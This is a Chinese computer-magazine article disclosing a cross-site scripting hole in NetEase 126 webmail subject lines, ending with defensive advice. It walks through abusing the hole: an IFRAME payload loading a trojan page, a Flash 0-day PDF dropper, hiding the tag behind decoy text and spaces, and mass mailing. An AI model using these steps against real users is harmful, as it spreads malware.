文/苗得雨

网易邮箱：中国人气最盛的电子邮箱

最近的网络跨站漏洞系列似乎针对博客系统与具有交互功能的网站比较多，虽然我们发现了许多不同网站的不同种类的跨站漏洞，但是仍然没有逃脱出找到网站跨站漏洞后，通过网页钓鱼方式利用的老套路，这实际上是一种非常被动的方式，那么有没有更加巧妙或者与众不同的跨站方式呢？

安全小百科：跨站漏洞目前在国内外许多网站中都大范围存在，黑客主要利用知名网站中的跨站漏洞进行挂马，依靠用户对于这些知名网站的信任达到迷惑用户，使这些网站成为黑客挂马的跳板。这就如同你一直信任某家医院，但是这家医院却因为疏于做内部检查，导致有恶意的外来假冒医生可以在医院内部开设虚假诊所，打着这家医院的旗号欺骗患者一样。

我们首先想到了电子邮箱，而一提到电子邮箱，网易邮箱一定是多数用户第一时间联想到的。网易电子邮箱是国内最早的免费电子邮箱系统之一，而且通过十多年的积累，如果已经成为一个突破1.5亿注册用户，国内最大的免费电子邮箱系统。

面对这样一个庞大的用户群体，如果能够从网易电子邮箱中寻找到突破口，通过邮件进行跨站挂马发送，岂不是要比单纯的再某个博客上挂马更加有效果吗？我们决定挑战一下网易免费电子邮箱系统，搜查网易电子邮箱的跨站漏洞！

 

寻找漏洞

实施证明，挑战中国最大的免费电子邮箱系统，的确需要耐心和勇气。我们首先想通过撰写含有HTML内容的邮件实现跨站的目的，然而测试后发现，网易126邮箱能够对所有的IFRAME之类的框架HTML进行过滤，这说明网易还是非常注重电子邮箱的安全性的。

再几经努力不断的变换各种跨站的语言后，我们几乎完全放弃了挑战网易126邮箱的信心。不过也就在这个时候，我们突然注意到，网易在表示电子邮件标题时好像也可以使用HTML语言，这里会不会是一个突破口呢？

随后我们立刻在测试邮件的主题中输入“<IFRAME SRC="http://www.google.cn/"></IFRAME>”这种最常见的HTML框架语句（图1），发送该邮件。接着再打开这个主题邮件后，我们发现126邮箱果然正常解析IFRAME代码（图2），邮件中已经可以显示Google的网站。

在浏览器中右键选择菜单中的属性也看到是Google的链接地址，这意味着当用户打开主题含有这种框架结构的邮件后，浏览器就会在用户不知情的情况下自动加载Google页面。而通过IE临时文件夹中的Cookie我们看到了加载后Google页面的相关信息（图3），这证明我们已经找到了一个全新的网易126邮箱的跨站漏洞。

图1

图2

图3

漏洞实现方法

黑客会怎么利用邮箱跨站漏洞呢？因为是电子邮箱中的跨站漏洞，因此黑客完全可以使用欺骗的手段，撰写一封类似有关《魔兽世界》这种与网易有关的热门话题相关的虚假邮件进行传播。为了验证这个漏洞的有效性和危害性我们进行了实战测试：

步骤1：首先使用最近颇为流行的Flash 0Day溢出生成工具，生成一个PDF格式的溢出文件，这个PDF格式的文件中，包含有Flash元素，当用户使用浏览器点击打开浏览或者下载浏览该PDF时就会中马。

我们也找到了其中的一款Flash 0Day生成器，生成了一个可以溢出的PDF文件，只需要在生成器中输入配置好的下载者等微型下载木马的网址，然后点击生成即可。

图4

步骤2：将生成好的Flash溢出文件上传到自己的网站空间中，然后在去网易邮箱中注册一个账号（图5）。账号注册完成后，点击左侧菜单中的“写信”按钮。在写信窗口的“主题”输入栏中输入<IFRAME SRC="http://网页木马地址/"></IFRAME>

 

图5

 

步骤3：这是非常关键的一个步骤，在我们实际测试过程中发现，虽然我们可以直接将IFRAME写在标题之中，但是这样很容易引起收信人的怀疑，因此我们可以再IFRAME框架代码之前加入一些迷惑性的语句，例如“尊敬的网易用户”等，写入十五个字左右的标题之后，然后加入足够的空格键，就可以实现完全隐藏IFRAME框架代码的目的。（图6）

 

图6

步骤4：最后通过邮件列表，将这封邮件大规模的发送。可以想象如果黑客通过该漏洞进行大规模的跨站挂马，一定会比单纯的依靠博客这种愿者上钩的方式来的更加有效。

 

防范手段

由于这个漏洞存在于网易邮箱中，因此我们建议网易方面尽快改进126邮箱的内容过滤。在网易方面没有完成改善前，我们建议用户开启计算机杀毒软件中的网页实时监控功能，或者升级最新的IE浏览器并安装《安天防线》等杀毒反间谍软件，进行有效的拦截。

 

《安天防线》下载地址

http://www.antiyfx.com/download.htm

 

原文已发表在《电脑报》